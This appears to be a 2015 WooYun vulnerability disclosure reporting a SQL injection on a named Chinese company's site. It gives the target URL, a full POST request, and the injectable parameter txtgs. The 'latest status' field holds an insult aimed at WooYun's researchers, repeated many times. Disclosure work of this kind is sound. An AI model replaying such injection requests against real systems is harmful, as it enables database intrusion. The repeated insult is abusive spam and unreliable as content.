当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120987

漏洞标题:中科三方某站点SQL注入

相关厂商:北京中科三方网络技术有限公司

漏洞作者: 路人甲

提交时间:2015-06-17 11:13

修复时间:2015-06-19 21:19

公开时间:2015-06-19 21:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

SQL注入

详细说明:

注入url:http://fax.sfn.cn:80/feat/MoneySell.aspx
POST数据:

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMzgyODg4NDY3D2QWAgIBD2QWCgIRDxAPFgYeDURhdGFUZXh0RmllbGQFBXVuYW1lHg5EYXRhVmFsdWVGaWVsZAUDdWlkHgtfIURhdGFCb3VuZGdkEBUQCeivt%2BmAieaLqQnmrrfmspvpm68J6KKB57Sg5LqRCeWImOWuj%2Bi/nAnlvKDnp4DlqJwJ5r2Y5paH5pm2CeWImOW8oOWuvgnoib7mloflsbEJ5byg6ZOB6I%2BKCeW8oOWpt%2BWptwnltJTkuK3lhpsG6buE5bu6BueOi%2BiJrwbotbXnkpAG6ZmI55KQCeimgeWon%2BWonxUQATABNgE5AjI1AjI2AjI3AjI4AjI5AjMwAjMxAjMyAjM0AjM2AjM3AjM4AjQwFCsDEGdnZ2dnZ2dnZ2dnZ2dnZ2dkZAITDw9kFgIeB29uY2xpY2sFI1dkYXRlUGlja2VyKHtkYXRlRm10Oid5eXl5LU1NLWRkJ30pZAIVDw9kFgIfAwUjV2RhdGVQaWNrZXIoe2RhdGVGbXQ6J3l5eXktTU0tZGQnfSlkAh0PPCsADQEADxYEHwJnHgtfIUl0ZW1Db3VudGZkZAIfDxYCHgVzdHlsZQVvbGVmdDo0MzZweDt3aWR0aDo2MDBweDt6LWluZGV4OjE7cG9zaXRpb246YWJzb2x1dGU7dG9wOjI2MHB4O2Rpc3BsYXk6bm9uZTtyaWdodDoyNjBweDtiYWNrZ3JvdW5kLWNvbG9yOiM2NkNDRkY7ZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUFY2t5ZXMFBWNrZnBZBQZSRHdmY3oFBlJEeWZjegUJR1Z6aGl4aWFvDxQrAApkZGRkZGQVAQNraWRkZhQrAAECAWQKQSooRwQc%2BxF8p6sxBO2yEi/RWA%3D%3D&__PREVIOUSPAGE=0ZdTI4HJvmkOWJ7N9b1oY6mgoex7oc0OPb11UNA2MZ57gA9wqog3kANMFS9SIHT6OwOKes-sD2KeClrIJDYUaMNoL-U1&__EVENTVALIDATION=/wEWLALeq8yUBALgz4TSBgLF5ua8DAKq/cinAgLM9PumDwK/p4jmCgKxi96RBQL7uKJnAqS%2B6lACiKea2AoCkqea2AoCj6ea2AoClqfm2woClqfi2woClqf%2B2woClqe62AoClqe22AoClafa2woClafW2woClafS2woClafq2woClafi2woClaf%2B2woClae62AoClKfa2woCxISogw4CxITA/wcC2eWx8w8Cmfv%2BiA8C9ZL50AQCm87SnAsC9IPL1QoCgfuq4AEC9rXT5w0CkPuS8g4C9onQ6QkC1cO%2B1Q8CvoTo/g4C3/GSQgKI3ZekDgK/scm9DAL3xc69DAL2krGmBALwkrGmBJNzEf0UtjImA2LWpnA/P%2BKPqymS&dpltywy=0&txtDate=&txtDate2=&txtgs=%E6%97%A5%E2%80%99&btngs=%E5%85%AC%E5%8F%B8%E6%90%9C%E7%B4%A2&txtfkje=


注入参数:txtgs

漏洞证明:

20.png


数据库用户:

21.png


数据库:

22.png

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-18 11:06

厂商回复:

正在处理。

最新状态:

2015-06-19:乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!乌云的白帽子都是大傻逼!